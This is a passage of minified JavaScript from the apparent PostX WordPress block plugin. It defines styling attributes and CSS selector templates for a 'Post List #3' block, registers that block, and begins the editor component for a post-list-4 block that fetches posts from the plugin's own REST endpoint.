2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"24",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"30",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title, \n          {{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:0,bottom:0,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},varticalAlign:{type:"string",default:"middle",style:[{depends:[{key:"varticalAlign",condition:"==",value:"top"}],selector:"{{ULTP}} .ultp-block-content-top .ultp-block-content { -ms-flex-item-align: flex-start;-ms-grid-row-align: flex-start;align-self: flex-start; }"},{depends:[{key:"varticalAlign",condition:"==",value:"middle"}],selector:"{{ULTP}} .ultp-block-content-middle .ultp-block-content { -ms-flex-item-align: center;-ms-grid-row-align: center;align-self: center; }"},{depends:[{key:"varticalAlign",condition:"==",value:"bottom"}],selector:"{{ULTP}} .ultp-block-content-bottom .ultp-block-content { -ms-flex-item-align: flex-end;-ms-grid-row-align: flex-end;align-self: flex-end; }"}]},imgFlip:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout3"]}],selector:"{{ULTP}} .ultp-block-content-true .ultp-block-media, \n          {{ULTP}} .ultp-block-content-1 .ultp-block-media { flex-direction: row-reverse; }"}]},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",depends:[{key:"showImage",condition:"==",value:!0}]},imgWidth:{type:"object",default:{lg:"50",ulg:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { max-width: {{imgWidth}}; height:fit-content; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { height:fit-content; }\n          {{ULTP}} .ultp-block-item .ultp-block-video-content iframe, \n          {{ULTP}} .ultp-block-item .ultp-block-video-content video,\n          {{ULTP}} .ultp-block-item .ultp-block-image img { height: {{imgHeight}}; }"}]},imageScale:{type:"string",default:"cover",style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img {object-fit: {{imageScale}};}"}]},imgAnimation:{type:"string",default:"opacity"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap { overflow:visible } \n          {{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-wrap { overflow:visible } \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},imgSpacing:{type:"object",default:{lg:"40"},style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!1},{key:"layout",condition:"==",value:"layout4"}],selector:"{{ULTP}} .ultp-block-image { margin-right: {{imgSpacing}}px; margin-left: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-block-image { margin-right: 0; margin-left: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!1},{key:"layout",condition:"==",value:"layout5"}],selector:"{{ULTP}} .ultp-block-image { margin-right: {{imgSpacing}}px; margin-left: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-block-image { margin-right: 0; margin-left: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!1},{key:"layout",condition:"!=",value:"layout4"}],selector:"{{ULTP}} .ultp-block-image { margin-right: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-block-image { margin-right: 0; margin-left: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { margin-left: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-block-image { margin-left: 0; margin-right: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-layout4 .ultp-block-item:nth-child(even) .ultp-block-content-wrap .ultp-block-image { margin-left:20px; }"}]},mobileImageTop:{type:"boolean",default:!0,style:[{selector:"@media (max-width: 768px) {\n            {{ULTP}} .ultp-block-item .ultp-block-image {margin-right:0; margin-left:0; max-width: 100%;} \n          {{ULTP}} .ultp-block-media .ultp-block-content-wrap { display: block;} \n          {{ULTP}} .ultp-block-media .ultp-block-content-wrap .ultp-block-content { margin: auto 0px !important; padding: 0px } }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:40,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:21,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:0,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt{ padding: {{excerptPadding}}; }"}]},separatorShow:{type:"boolean",default:!0},septColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:last-of-type) { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"dashed",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:last-of-type) { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:last-of-type) { border-bottom-width: {{septSize}}px; }"}]},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: center;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; } \n          .rtl  {{ULTP}} .ultp-block-meta { justify-content: start; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:" .rtl {{ULTP}} .ultp-block-readmore a {display:flex; flex-direction:row-reverse;justify-content: flex-end;}"}]},contentWrapBg:{type:"string",default:"var(--postx_preset_Base_1_color)",style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap { background:{{contentWrapBg}}; }"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content { background:{{contentWrapBg}} !important; }"}]},contentWrapHoverBg:{type:"string",style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap:hover { background:{{contentWrapHoverBg}}; }"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap:hover .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content-wrap:hover .ultp-block-content { background:{{contentWrapHoverBg}} !important; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_1_color)",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap:hover"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap:hover .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content-wrap:hover .ultp-block-content"}]},contentWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap { border-radius: {{contentWrapRadius}}; }"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap:hover { border-radius: {{contentWrapHoverRadius}}; }"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap:hover .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content-wrap:hover .ultp-block-content{ border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap:hover"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap:hover, .ultp-block-content \n          {{ULTP}} .ultp-layout5 .ultp-block-content-wrap:hover .ultp-block-content"}]},contentWrapInnerPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content { padding: {{contentWrapInnerPadding}}; }"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content-wrap .ultp-block-content { padding: {{contentWrapInnerPadding}}; }"}]},contentWrapPadding:{type:"object",default:{lg:"0",ulg:"px"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { padding: {{contentWrapPadding}}; }"}]},counterTypo:{type:"object",default:{openTypography:1,size:{lg:18,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{depends:[{key:"layout",condition:"==",value:"layout2"}],selector:"{{ULTP}} .ultp-layout2 .ultp-block-item::before"}]},counterColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{selector:"{{ULTP}} .ultp-layout2 .ultp-block-item::before { color:{{counterColor}}; }"}]},counterBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Contrast_2_color)"},style:[{selector:"{{ULTP}} .ultp-layout2 .ultp-block-item::before"}]},counterWidth:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-layout2 .ultp-block-item::before { width:{{counterWidth}}px; }"}]},counterHeight:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-layout2 .ultp-block-item::before { height:{{counterHeight}}px; }"}]},counterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Base_3_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-layout2 .ultp-block-item::before"}]},counterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-layout2 .ultp-block-item::before { border-radius:{{counterRadius}}; }"}]},headingText:{type:"string",default:"Post List #3"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto;}"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"pagination"},wrapAlign:{type:"object",default:{lg:"left"},style:[{selector:"{{ULTP}} .ultp-block-wrapper .ultp-block-item { text-align:{{wrapAlign}}; }"}]},...(0,o.t)(["heading","advFilter","advanceAttr","pagination","video","meta","category","readMore","query"],[],[{key:"queryNumPosts",default:{lg:5}},{key:"queryNumber",default:5},{key:"pagiAlign",default:{lg:"left"}},{key:"vidIconPosition",default:"center"},{key:"iconSize",default:{lg:"80",sm:"50",xs:"50",unit:"px"}},{key:"metaSeparatorColor",default:"var(--postx_preset_Contrast_3_color)"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"metaMargin",default:{lg:{top:"15",bottom:"15",unit:"px"},xs:{top:"10",bottom:"10",unit:"px"}}},{key:"metaPadding",default:{lg:{top:"1",bottom:"0",unit:"px"}}},{key:"catLineColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"catTypo",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""}},{key:"catColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"catBgColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"catHoverColor",default:"var(--postx_preset_Contrast_2_color)"},{key:"catBgHoverColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_2_color)"}},{key:"catSacing",default:{lg:{top:0,bottom:10,left:0,right:0,unit:"px"},xs:{top:15,bottom:0,left:0,right:0,unit:"px"}}},{key:"readMore",default:!0},{key:"readMoreIcon",default:" "},{key:"readMoreTypo",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"25",unit:"px"},spacing:{lg:"",unit:"px"},transform:"uppercase",weight:"500",decoration:"underline",family:""}},{key:"readMoreColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Contrast_2_color)"},{key:"readMoreSacing",default:{lg:{top:20,bottom:"",left:"",right:"",unit:"px"},xs:{top:15,unit:"px"}}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({})}},92756:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(38602),r=l(18490),s=l(2719);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-List-3/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-list-3.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postlist3.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-list-3","listBlocks")]},edit:n.Z,save:()=>null})},73576:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(53508),c=l(46896),u=l(71411),d=l(93985),m=l(8152),g=l(76005),y=l(99838),b=l(31760),v=l(73151),h=l(69735),f=l(2963),k=l(39349),w=l(87025),x=l(11162);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useEffect:C,useState:E,useRef:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=S(null),[l,M]=E(w.Ti),[A,H]=E(null),{setAttributes:N,name:j,clientId:Z,attributes:O,isSelected:R,className:D,context:z,attributes:{blockId:F,currentPostId:W,readMoreIcon:V,imgCrop:G,imgCropSmall:q,excerptLimit:$,showFullExcerpt:K,showSmallMeta:J,metaStyle:Y,metaShow:X,catShow:Q,showImage:ee,metaSeparator:te,titleShow:le,catStyle:oe,catPosition:ae,titlePosition:ie,excerptShow:ne,imgAnimation:re,imgOverlayType:se,imgOverlay:pe,metaList:ce,metaListSmall:ue,showSmallCat:de,readMore:me,readMoreText:ge,showSmallBtn:ye,showSmallExcerpt:be,varticalAlign:ve,imgFlip:he,metaPosition:fe,layout:ke,customCatColor:we,onlyCatColor:xe,contentTag:Te,titleTag:_e,showSeoMeta:Ce,titleLength:Ee,metaMinText:Se,metaAuthorPrefix:Pe,titleStyle:Le,metaDateFormat:Ie,authorLink:Be,fallbackEnable:Ue,vidIconEnable:Me,notFoundMessage:Ae,excerptLimitLg:He,showFullExcerptLg:Ne,dcEnabled:je,dcFields:Ze,previewImg:Oe,advanceId:Re,paginationShow:De,paginationAjax:ze,headingShow:Fe,filterShow:We,paginationType:Ve,navPosition:Ge,paginationNav:qe,loadMoreText:$e,paginationText:Ke,V4_1_0_CompCheck:{runComp:Je}}}=e;function Ye(e){M({...l,selectedDC:e})}function Xe(){M({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Qe(e){M({...l,section:{...w.ZQ,[e]:!0}}),(0,w.Rt)(e),(0,w.ob)(e),H("setting")}function et(e){M((t=>({...t,toolbarSettings:e}))),(0,w.os)(e)}function tt(){l.error&&M({...l,error:!1}),l.loading||M({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(O)}).then((e=>{M({...l,postsList:e,loading:!1})})).catch((e=>{M({...l,loading:!1,error:!0})}))}C((()=>{(0,w.oA)(),tt()}),[]),C((()=>{const t=Z.substr(0,6),l=B(U(Z));(0,a.qi)(N,l,W,Z),(0,v.h)(e),F?F&&F!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||N({blockId:t})):(N({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&N({queryType:"archiveBuilder"}))}),[Z]),C((()=>{const e=t.current;(0,h.o6)()&&0===O.dcFields.length&&N({dcFields:Array(x.PR).fill(void 0)}),e?((0,a.Qr)(e,O)&&(tt(),t.current=O),e.isSelected!==R&&R&&(0,w.gT)(Qe,et)):t.current=O}),[O]);const lt={settingTab:A,setSettingTab:H,setAttributes:N,name:j,attributes:O,setSection:Qe,section:l.section,clientId:Z,context:z,setSelectedDc:Ye,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){Ye(e),et("dc_group")}};let ot;if(F&&(ot=(0,y.Kh)(O,"ultimate-post/post-list-4",F,(0,a.k0)())),Oe&&!R)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Oe});C((()=>{R&&Oe&&N({previewImg:""})}),[e?.isSelected]);const at=_({...Re&&{id:Re},className:`ultp-block-${F} ${D}`,onClick:e=>{e.stopPropagation(),Qe("general"),et("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:lt,selected:l.toolbarSettings}),(0,o.createElement)(b.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"layout",block:"post-list-4",key:"layout",options:[{img:"assets/img/layouts/pl4/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pl4/l2.png",label:__("Layout 